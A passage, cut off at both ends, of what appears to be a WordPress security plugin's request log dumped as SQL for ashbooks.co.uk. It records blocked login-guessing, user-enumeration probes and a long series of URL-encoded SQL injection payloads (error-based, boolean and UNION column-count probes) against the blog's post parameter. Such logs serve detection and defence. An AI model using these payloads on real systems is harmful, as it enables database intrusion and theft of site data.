Safari\\/537.36\"}','jy0EgwkcIopOfQHtXYhKVrJx',0,1637208055.5741,1461,'','GET',403,0,520,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','qbm530xXQ7RC1i2EwgGMaHUh',0,1637208121.9096,2278,'','GET',403,0,520,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','XntmDL62K8jBeJQWSlAvIdTP',0,1637208126.8120,1732,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-admin/css/colors/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','2Oyk3VquMDSP4vhJcdbQI8rg',0,1637208888.4138,439,'','POST',403,0,700,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','v231tgzd7NEDoj0ip4qMYxa5',0,1637208974.7881,175,'','POST',403,0,600,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','OZ7sm3yEtvGkbw2qxUFVYMSQ',0,1637209066.9955,161,'','GET',403,0,520,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','7iajkCymwFpDHLQhq4OrbXKR',0,1637209068.1743,426,'','POST',403,0,600,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','PUXLNcsfQ1SGMlCp7er4tqwY',0,1637209319.6808,399,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','af3AGNEjwXWsqYgDBkliKV8p',0,1637210840.8449,573,'','POST',403,0,600,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','X9W0FzOtomUYcRJIjvfp2xZ6',0,1637213889.5625,613,'','POST',403,0,600,0,1,'',0),('206.189.6.60',3468494396,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','knez1YETOWfiAqK63Q257x4S',0,1637215348.1954,521,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=%28SELECT%20%28CASE%20WHEN%20%288298%3D8799%29%20THEN%208298%20ELSE%208298%2A%28SELECT%208298%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','SdOpiIE8bKtgPcNorGLBz0nZ',0,1637215489.6030,407,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=%28SELECT%20%28CASE%20WHEN%20%281307%3D1307%29%20THEN%201307%20ELSE%201307%2A%28SELECT%201307%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','tL4lQcR0TaGNfqPKenk6jxI8',0,1637215490.8564,433,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%283738%3D3738','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','2suNjcd4B3YfpbReL8XEyr7Q',0,1637215492.3863,394,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','GT4ea8wO7gEI32SNtdPiMuLq',0,1637215493.9262,505,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20Njdt','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','MCt3PDS9QHYabVcAhxvfRzJp',0,1637215495.4266,389,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ilZU%27%3D%27ilZU','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','6DwAEQXvoIqLuxbr9ltmKTc2',0,1637215496.9614,446,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27nQNk%27%3D%27nQNk','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','JOgIR9GDlqr5t7PfoQ6hVkbc',0,1637215498.3761,409,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20AND%20%28SELECT%205948%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%285948%3D5948%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','AHneDoi3skqtPNdlL2zjWpfI',0,1637215499.6062,456,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%288024%3D8024','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hybt2R0WLiOM1z5q6SkJX8VZ',0,1637215517.5935,438,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','RSycnjTZodNsCKevBmM6q51A',0,1637215519.0882,409,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29--%20Owwc','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','iOP0gtEmfoaeWHpux6l5njL3',0,1637215520.4846,433,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%28%27tWEU%27%3D%27tWEU','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','b5Vgyz0t8oUDcf7vdP2eKwQh',0,1637215521.7458,388,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%27KchA%27%3D%27KchA','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','04bBql8tTNe9UzywpjiLFQYI',0,1637215523.4433,414,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20AND%204415%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%284415%3D4415%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','flic7D5vQVSHdaATZJo8g2sb',0,1637215525.2611,409,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=%28SELECT%208961%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707171%2C%28SELECT%20%28ELT%288961%3D8961%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','OTovA5nH2wWX7QLhtFki8mEP',0,1637215544.1096,381,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289307%3D9307%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','orl4NbXUfnuVMDmxB8wJdEa0',0,1637215551.9130,392,'','GET',403,0,700,0,1,'',0),('107.150.57.34',1805007138,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8f7hUBNaDjQAS2E0PMOXy9kJ',0,1637215583.7890,183,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL--%20zQot','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','OS49dsC7yMnrIFKtekaWw5m2',0,1637215680.2332,444,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20gXCQ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','UkILZ0o8NMy1f7TKqujAxFVX',0,1637215682.1234,441,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20BvyP','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','bClyPcZpmHLg4hKDfOUt9EQV',0,1637215683.9169,393,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20KOhi','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hsFGednNgHOXz0b8u2Avi4KZ',0,1637215685.5703,421,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20jEBn','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','YfcjJsgMiHNtrAwmbBR0I7Ql',0,1637215687.0273,398,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20mqzQ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','UvZCkVlhTDBIRyncjzXGEHQP',0,1637215688.8525,400,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20DzCB','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','MujlXKoIhFnc2qkQLJyf3vrx',0,1637215690.4857,381,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20vjdg','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','Y8FfuLXUoaK5RVblcgDyBi7d',0,1637215692.3046,392,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TWJZ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','Kej6Iyo1VAqmtOEWMXsSd7UN',0,1637215693.8621,384,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20eBGb','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','GBj4SuHsJXe6ZI7RWqgDn0Qd',0,1637215695.7718,1342,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL--%20rnco','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','21lYmHnNKXpqC4rkjIbOUeSx',0,1637215704.3767,449,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20ywJo','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','FB5ikWvSYmMoZhLdwyuzq1xP',0,1637215706.2728,437,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20qkVG','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','T6mbBYhAq8wJn4fgEz3WcvPU',0,1637215708.4305,383,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20cDoH','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','NCk4KzE2GnDV8QJuIZlAaPo5',0,1637215709.9492,422,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20WzIX','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','nV6jluG4HPXLJZ5wW2YcmaIy',0,1637215711.4299,441,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20jnZb','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','xQPy3C5rkTqfvIGZwOR6XWAc',0,1637215712.6930,451,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ABSb','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','lMSTwDpxKNR1k2qjGCAzLY0t',0,1637215714.5344,443,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20mIZa','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','cpB4yOuEmX8d9hAxb1nTWLtr',0,1637215716.5267,419,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20SZRs','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8szJF9XHY4GtjoWlm2CpNTyB',0,1637215718.6523,459,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20bMsq','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','X3CdsHaurjfU2z0W74FQJNOV',0,1637215720.3998,722,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL--%20AelO','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ucB0Z2fhFoDUl7tJIj3a8Wi4',0,1637215728.0613,429,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20CMHM','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','1seMYkORJuLKW90ThqUaPcpS',0,1637215729.3089,445,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20MCNI','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','qj4BNGXQJCP2dSphAyUR6HIl',0,1637215730.6820,453,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20KcYM','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','UKOEPmFdZ03spqiSaCbhwL4D',0,1637215732.6090,448,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OUSV','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','q5mlB7zhiZkJebWMYVUoKuwn',0,1637215734.0539,426,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20oKzk','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','Fj9YUEZNR17zphMrqHAi8XLc',0,1637215735.9084,849,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20EBVZ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','cUMI87uTQeOp5RLsyJDwEVl2',0,1637215737.9322,422,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20FAMz','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hVylSZCkF7YW3BspXtdMEgm4',0,1637215739.4448,465,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZCxG','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','db83EumlNqVDKwOvC7AzIScF',0,1637215740.8339,469,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20culY','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8plfsY3uxUDNEICdBgT1rLoJ',0,1637215742.5947,468,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL--%20YhAY','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8OrpT1uBJ4sDQC0lXE6Azkfx',0,1637215750.8451,438,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20BBFw','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','puPRaLQ1CH9vKeminTEJYjtX',0,1637215752.1311,451,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20TFXn','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','oGHK1jRwEI23JODeT7XabkCc',0,1637215753.7388,437,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20vFCU','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','PO0oEukcb5ZGwhFNpmLfaMVl',0,1637215755.6727,436,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20hXMc','','{\"1\":\"Opera\\/8.01 